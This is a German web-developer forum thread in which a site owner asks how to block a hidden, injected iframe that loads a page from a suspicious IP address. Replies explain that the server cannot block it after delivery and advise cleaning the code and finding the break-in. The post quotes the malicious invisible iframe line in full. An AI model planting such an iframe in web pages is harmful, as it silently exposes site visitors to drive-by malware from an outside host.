Aufruf erkennen und blocken

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Aufruf erkennen und blocken

    hallo zusammen,
    Ich habe das problem, das bei mir auf der Seite etwas aufgerugen, und zwar in einem Iframe.

    Nun möchte ich, mit PHP, diesen aufruf blocken.
    Das heisst also, das ich zuerst den zugriff auf eine Seite feststellen muss, und ihn nachher zu blocken.

    Funktioniert das mit PHP?
    Wenn ja, wie?
    Bücher für Programmierer

  • #2
    Erläutere dein Problem genauer. Kommt der Aufruf von einer externen Seite, die deinen Content einbindet?
    Für alle die Fehler suchen, gibts gratis tolle Debuggingmöglichkeiten:
    var_dump(), print_r(), debug_backtrace und echo.
    Außerdem gibt es für unsere Neueinsteiger ein hervorragendes PHP Tutorial zu PHP 4 und PHP 5 (OOP)
    Es heißt $array['index'] und nicht $array[index]! Und nein, das ist nicht egal!
    Dieses Thema lesen, um Ärger im Forum und verzögerte Hilfen zu vermeiden.

    Kommentar


    • #3
      genauer gesagt handelt es sich um eine art Virus, der automatisch eingebunden wird.
      81.95.149.26/logo/index.php auf diese adresse wird er aurfgerufen, mit folgendem code:
      Code:
      <iframe src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
      Nun könnte man sicher mit php den aufruf der Seite Blockieren, sodass auch nicht passiert.

      ps:
      Hab schon alles, probiert in sachen Virenprogrammen usw.
      Bücher für Programmierer

      Kommentar


      • #4
        Hä?
        Ich versteh kein Wort. Virus?
        Bitte nochmal von Vorne erklären.

        Kommentar


        • #5
          1. Wieso kann der Benutzer bestimmten was in deinem Iframe eingebunden wird?
          2. Wenn nicht, wieso bindest du dann diesen Virus ein?
          3. Warum benutzt du überhaupt Iframes?
          Nur wenige wissen, wieviel man wissen muss, um zu wissen, wie wenig man weiß.

          Kommentar


          • #6
            Nun, der Virus wird automatisch eingebunden, und zwar in versteckten Iframes..
            Mehr zum Virus:
            http://www.google.ch/search?hl=de&q=81.95.149.26&meta=
            Bücher für Programmierer

            Kommentar


            • #7
              "automatisch"? Von wem oder was denn bitte? Von deinem Server? Verstehe ich nicht. Wieso antwortest du nicht auf meine Fragen?
              Nur wenige wissen, wieviel man wissen muss, um zu wissen, wie wenig man weiß.

              Kommentar


              • #8
                Wenn es einem schlauen aber bösen menschen gelingt, diesen Code in deiner Seite zu platzieren, hast du keine Möglichkeit, den Aufruf zu blocken, nachdem die Seite ausgeliefert wurde, da der Browser die Seite lädt, die in dem iframe dargestellt werden soll, ohne vorher bei deinem Server zu fragen, ob er das auch darf...

                Die einzige Möglichkeit wäre, deine Seiten VOR der Auslieferung an den Browser auf den entsprechenden Code hin zu untersuchen und diesen zu entfernen.

                Ist allerdings ein wenig umständlich, weil du wirklich jede Ausgabe parsen musst...

                Informationen, wie der Hacker den schädlichen Code auf deiner Seite paltziert hat oder platzieren kann wären hilfreicher, um die Veränderung gleich von vornherein auszuschließen...

                Ist das Kind erst in den Brunnen gefallen, dann ist die einfachste und schnellste Lösung natürlich, den Fraglichen Code von Hand zu bereinigen und neu zu veröffentlichen.

                greetz, high
                Good programming is 40% experience, 20% skill, 20% RTFM, 15% caffeine, and 5% attention to detail.
                When everything else fails, manipulate the data...
                Beschriftungen / Großformatdruck / Werbemittel

                Kommentar


                • #9
                  schau mal bei google vorbei, da gibt es einige infos zu dem thema.

                  gruß
                  peter
                  Nukular, das Wort ist N-u-k-u-l-a-r (Homer Simpson)
                  Meine Seite

                  Kommentar


                  • #10
                    hi

                    evtl hilft dir dieser link weiter
                    www.stoer-angler.de/.../viewtopic.php?t=562
                    4cms.de

                    Kommentar

                    Lädt...
                    X